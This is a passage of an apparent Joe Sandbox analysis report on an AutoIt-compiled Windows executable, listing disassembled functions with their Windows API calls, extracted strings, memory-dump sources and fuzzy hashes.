                    • GetWindowRect.USER32(00000000), ref: 00CCC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00CCC636
                    • GetClientRect.USER32(?,?), ref: 00CCC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00CCC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CCC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 28fba10f24750c4db37e02c8d1d224200ca996a56f179145347dd47812a6e6fe
                    • Instruction ID: 9e296bb8fc52cd05ff720eff488d60095eaa523cbfa9126373b3c2ba2b7534bf
                    • Opcode Fuzzy Hash: 28fba10f24750c4db37e02c8d1d224200ca996a56f179145347dd47812a6e6fe
                    • Instruction Fuzzy Hash: 99515B71900709AFDB20DFA8DE89F6EBBB5FF04705F00492CF696A25A0CB74A945DB50
                    Function 00CFA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00CFA4C8
                    • DestroyWindow.USER32(?,?), ref: 00CFA542
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CFA5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CFA5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFA5F1
                    • DestroyWindow.USER32(00000000), ref: 00CFA613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C70000,00000000), ref: 00CFA64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CFA663
                    • GetDesktopWindow.USER32 ref: 00CFA67C
                    • GetWindowRect.USER32(00000000), ref: 00CFA683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CFA69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CFA6B3
                      • Part of subcall function 00C725DB: GetWindowLongW.USER32(?,000000EB), ref: 00C725EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: e995de73bc8aebab871a8bba29f2fa5df080f55d9e1be278e4a62d38a8ba6540
                    • Instruction ID: b264e8b67d01368a52ee32e08de81026a3ee3ef6dadd877763da163dbe238b9d
                    • Opcode Fuzzy Hash: e995de73bc8aebab871a8bba29f2fa5df080f55d9e1be278e4a62d38a8ba6540
                    • Instruction Fuzzy Hash: 6D717EB1140209AFD720CF28CC45F7AB7E5EB88344F08452DFA99C72A0D770E906DB26
                    Function 00CF4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 00CF46AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CF46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 5eb3de788cdd45b161c654d2a3931a01d928e880945a66109200289f4e5a2bc2
                    • Instruction ID: 4fcbdaa8bb117ae5460bb68be4ca264c787b1425f8a7a442441a88495e742086
                    • Opcode Fuzzy Hash: 5eb3de788cdd45b161c654d2a3931a01d928e880945a66109200289f4e5a2bc2
                    • Instruction Fuzzy Hash: B891A2342043059FCB18EF14C451A7EB7A1EF94324F14846DF99A5B3A2DB70EE46EB42
                    Function 00CFBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CFBB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CF9431), ref: 00CFBBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFBC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CFBC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CFBC7D
                    • FreeLibrary.KERNEL32(?), ref: 00CFBC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CFBC99
                    • DestroyCursor.USER32(?), ref: 00CFBCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CFBCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CFBCD1
                      • Part of subcall function 00C9313D: __wcsicmp_l.LIBCMT ref: 00C931C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 3907162815-1154884017
                    • Opcode ID: ae7caeb493ea42e38bae575730aa373494ee7c6b51f75270a590ebd6e45cfd7e
                    • Instruction ID: 63dec8de914d73c9755ce5f71a529e933fd5de92322e9bfbf61b5f1a7b315032
                    • Opcode Fuzzy Hash: ae7caeb493ea42e38bae575730aa373494ee7c6b51f75270a590ebd6e45cfd7e
                    • Instruction Fuzzy Hash: 2A61CE71500619BBEB14DF64CC85FBE7BA8EF08721F10411AFA25D61D0DB74AE80DBA1
                    Function 00CDA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C79997: __itow.LIBCMT ref: 00C799C2
                      • Part of subcall function 00C79997: __swprintf.LIBCMT ref: 00C79A0C
                    • CharLowerBuffW.USER32(?,?), ref: 00CDA636
                    • GetDriveTypeW.KERNEL32 ref: 00CDA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDA730
                      • Part of subcall function 00C77D2C: _memmove.LIBCMT ref: 00C77D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 81467ba5add13ef1a0f1b0cf9e54dc065540299bcb41e38871751c10ed526ab4
                    • Instruction ID: 76eeed2e44c545b42fb07f1f21703545fc22454b14b3ede56a445755be9c93ec
                    • Opcode Fuzzy Hash: 81467ba5add13ef1a0f1b0cf9e54dc065540299bcb41e38871751c10ed526ab4
                    • Instruction Fuzzy Hash: 5D516A711047099FC700EF24D88196AB7F4FF98718F14896DF89A972A1DB31EE0ADB52
                    Function 00CDA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CDA47A
                    • __swprintf.LIBCMT ref: 00CDA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CDA4FE
                    • _memset.LIBCMT ref: 00CDA51D
                    • _wcsncpy.LIBCMT ref: 00CDA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CDA58E
                    • CloseHandle.KERNEL32(00000000), ref: 00CDA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 00CDA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 00CDA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: ff780697b163286873e0082157371632ead9afb7fc98d7ee1de021176ea76d61
                    • Instruction ID: edcfa1f08987d1e925ada8aab15cc59f7702cffb09124d61db56443dc707d4fa
                    • Opcode Fuzzy Hash: ff780697b163286873e0082157371632ead9afb7fc98d7ee1de021176ea76d61
                    • Instruction Fuzzy Hash: 84318EB650011AABDB219FA0DC89FBF73BCEF88701F1041BAFA18D6160E77097458B25
                    Function 00CDDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                    Download Yara Rule
                    APIs
                    • __wsplitpath.LIBCMT ref: 00CDDC7B
                    • _wcscat.LIBCMT ref: 00CDDC93
                    • _wcscat.LIBCMT ref: 00CDDCA5
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CDDCBA
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CDDCCE
                    • GetFileAttributesW.KERNEL32(?), ref: 00CDDCE6
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CDDD00
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CDDD12
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                    • String ID: *.*
                    • API String ID: 34673085-438819550
                    • Opcode ID: de3b4b9fd3efe147a6ca0f18fc9d43ea02cf226c8ddaf5333ae2a37be6c15842
                    • Instruction ID: 3f4c02c295b6c105a957934102936efcf08f9eda8401a86e7b0f18724b0b4006
                    • Opcode Fuzzy Hash: de3b4b9fd3efe147a6ca0f18fc9d43ea02cf226c8ddaf5333ae2a37be6c15842
                    • Instruction Fuzzy Hash: 17818271904241AFCB24EF64C8459AAB7E8FF88314F15882FFA9AC7350E731DA45DB52
                    Function 00CC83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CC874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CC8766
                      • Part of subcall function 00CC874A: GetLastError.KERNEL32(?,00CC822A,?,?,?), ref: 00CC8770
                      • Part of subcall function 00CC874A: GetProcessHeap.KERNEL32(00000008,?,?,00CC822A,?,?,?), ref: 00CC877F
                      • Part of subcall function 00CC874A: RtlAllocateHeap.NTDLL(00000000,?,00CC822A), ref: 00CC8786
                      • Part of subcall function 00CC874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00CC879D
                      • Part of subcall function 00CC87E7: GetProcessHeap.KERNEL32(00000008,00CC8240,00000000,00000000,?,00CC8240,?), ref: 00CC87F3
                      • Part of subcall function 00CC87E7: RtlAllocateHeap.NTDLL(00000000,?,00CC8240), ref: 00CC87FA
                      • Part of subcall function 00CC87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CC8240,?), ref: 00CC880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CC8458
                    • _memset.LIBCMT ref: 00CC846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CC848C
                    • GetLengthSid.ADVAPI32(?), ref: 00CC849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00CC84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CC84F6
                    • GetLengthSid.ADVAPI32(?), ref: 00CC8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CC8522
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00CC8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CC854A
                    • CopySid.ADVAPI32(00000000), ref: 00CC8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CC8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CC85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CC85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 2347767575-0
                    • Opcode ID: 16bc994b2954be965633fa80c34b09ca53857ec4c24f1f61a3f492635102bc45
                    • Instruction ID: 3dd576ff9571508ed49bb4c5bd147c71ed305d3cc4c650341844b7f87baa2c16
                    • Opcode Fuzzy Hash: 16bc994b2954be965633fa80c34b09ca53857ec4c24f1f61a3f492635102bc45
                    • Instruction Fuzzy Hash: 4C611771900219ABDF109FA4DC45FAEBBB9FF08300B14816EF925A7291DB719A19DF60
                    Function 00CE762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 00CE76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CE76AE
                    • CreateCompatibleDC.GDI32(?), ref: 00CE76BA
                    • SelectObject.GDI32(00000000,?), ref: 00CE76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CE771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00CE7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CE777B
                    • SelectObject.GDI32(00000006,?), ref: 00CE7783
                    • DeleteObject.GDI32(?), ref: 00CE778C
                    • DeleteDC.GDI32(00000006), ref: 00CE7793
                    • ReleaseDC.USER32(00000000,?), ref: 00CE779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: 85b5ec6b45111b87da78c3b76c3b8886e66cf0d565da2a18495270acdba15c2f
                    • Instruction ID: d552d3bb0ad8e6a8466d1f346e46d6a8938557de928707c08a661bb654cc57b6
                    • Opcode Fuzzy Hash: 85b5ec6b45111b87da78c3b76c3b8886e66cf0d565da2a18495270acdba15c2f
                    • Instruction Fuzzy Hash: 5C516775904249EFCB15CFA9CC89FAEBBB9EF48310F14852DF95AA7210D731A941CB60
                    Function 00CDA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                    Download Yara Rule
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,00CFFB78), ref: 00CDA0FC
                      • Part of subcall function 00C77F41: _memmove.LIBCMT ref: 00C77F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 00CDA11E
                    • __swprintf.LIBCMT ref: 00CDA177
                    • __swprintf.LIBCMT ref: 00CDA190
                    • _wprintf.LIBCMT ref: 00CDA246
                    • _wprintf.LIBCMT ref: 00CDA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                    • API String ID: 311963372-2391861430
                    • Opcode ID: 84adbb6fff9541765abaf8a2bd821d0ff7b2411cb5b40cb1e630811badf92753
                    • Instruction ID: 6ee905c9ed792a3d3fc03622d8fe8ebb0575a3d9d08fcf13d285f7fdf4d4fc5e
                    • Opcode Fuzzy Hash: 84adbb6fff9541765abaf8a2bd821d0ff7b2411cb5b40cb1e630811badf92753
                    • Instruction Fuzzy Hash: 65514F71900219BACF15EBE0CD86EEEB779EF14300F104165F519B21A1EB316F59EB61
                    Function 00C76BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C90B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C76C6C,?,00008000), ref: 00C90BB7
                      • Part of subcall function 00C748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C748A1,?,?,00C737C0,?), ref: 00C748CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C76D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00C76E5A
                      • Part of subcall function 00C759CD: _wcscpy.LIBCMT ref: 00C75A05
                      • Part of subcall function 00C9387D: _iswctype.LIBCMT ref: 00C93885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 000b680cc33495336ab0b45acb1aac3512e1f41975053d905d5bab9099036972
                    • Instruction ID: 50daffa706150fda0be607b70f6bc0be7c2a8175f7a3f5b8ac1862e6a40a8e45
                    • Opcode Fuzzy Hash: 000b680cc33495336ab0b45acb1aac3512e1f41975053d905d5bab9099036972
                    • Instruction Fuzzy Hash: 9302B0301087419FC724EF24C881AAFBBE5FF95354F04891DF49A972A1DB70DA49EB92
                    Function 00C745DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00C745F9
                    • GetMenuItemCount.USER32(00D36890), ref: 00CAD7CD
                    • GetMenuItemCount.USER32(00D36890), ref: 00CAD87D
                    • GetCursorPos.USER32(?), ref: 00CAD8C1
                    • SetForegroundWindow.USER32(00000000), ref: 00CAD8CA
                    • TrackPopupMenuEx.USER32(00D36890,00000000,?,00000000,00000000,00000000), ref: 00CAD8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CAD8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: e753022dd9aafe5e5ca7fd4ca73232e854dec50c7894976aefb3faf89a360ce7
                    • Instruction ID: 57070dff6115d732c0dad371a09887f31fb5efc82530d25d141cc18b676662ba
                    • Opcode Fuzzy Hash: e753022dd9aafe5e5ca7fd4ca73232e854dec50c7894976aefb3faf89a360ce7
                    • Instruction Fuzzy Hash: CD712970604206BFEB248F65DC89FAEBF64FF06368F104216F52AA61E0C7B19D50DB91
                    Function 00CF10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CF0038,?,?), ref: 00CF10BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
